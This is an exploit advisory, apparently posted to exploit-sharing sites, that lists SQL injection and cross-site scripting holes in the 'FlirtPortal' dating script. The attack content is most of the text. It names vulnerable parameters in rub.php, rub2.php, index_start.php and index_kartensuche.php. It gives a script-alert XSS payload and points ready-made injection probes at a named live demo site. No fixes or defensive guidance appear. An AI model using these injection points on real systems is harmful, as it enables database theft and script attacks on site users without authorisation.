######################################################################################## # # # Exploit Title : FlirtPortal Script Multiple Vulnerabilities # # # # Author : Secure-Land Security Team # # # # Discovered By : farbodmahini # # # # Home : Secure-Land.net # # # # Version : All Version # # # # Demo : www.scripte24shop.de/demo/flirtportal # # # # Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com # # # # Security Risk : High # # # # # ######################################################################################## # # # Expl0iT: # # # # ~[SQL] : # # # # http://[TarGeT]/rub.php?rub=[SQL] # # http://[TarGeT]/rub2.php?rub=[SQL] # # http://[TarGeT]/index_start.php?trefferid=[SQL] # # # # ~[XSS] : # # # # http://[TarGeT]/index_kartensuche.php?ctitle=[XSS] # # # # +XSS : <script>alert(/farbodmahini/)</script> # # # # # # Demo : # # # # www.scripte24shop.de/demo/flirtportal/index_kartensuche.php?ctitle=[XSS] # # http://www.scripte24shop.de/demo/flirtportal/index_start.php?trefferid=8' # # http://www.scripte24shop.de/demo/flirtportal/rub2.php?rub=3' # # http://www.scripte24shop.de/demo/flirtportal/rub.php?rub=4' # # # ######################################################################################## # # # Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us # # # ######################################################################################## # # # Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id # # # ########################################################################################